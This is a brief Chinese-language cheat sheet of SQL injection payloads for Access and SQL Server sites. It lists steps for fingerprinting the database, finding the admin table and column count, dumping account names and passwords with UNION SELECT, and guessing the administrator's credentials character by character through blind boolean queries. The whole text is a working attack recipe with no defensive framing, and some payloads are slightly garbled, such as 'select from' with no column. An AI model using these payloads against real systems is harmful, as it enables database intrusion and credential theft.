and exists(select from msysobjects) >0 判斷是否為access數據庫
and exists(select from sysobjects) > 0 判斷是否為sql server數據庫

and exists(select from admin) 查看是否存在admin表 代表所有，可修改字段名
order by 數值 判斷字段長度,正常則證明字段名長度在數值范圍內，報錯則超出范圍
union select 1-正確數值 from 表名 聯合查詢，查詢出兩個數值
union select 上面第一個正確數值，第二個正確數值 from 表名 爆出賬號密碼
and(select len(admin)from admin) = 5 正常說明管理員賬戶長度為5 <>
and(select top 1 asc(mid(admin,1,1))from admin)>100 猜解管理員賬號的第一個數據，通過判

斷ascii碼判斷，返回正常則大于，反之則小于
mid(admin,2,1) 找第二列，依次類推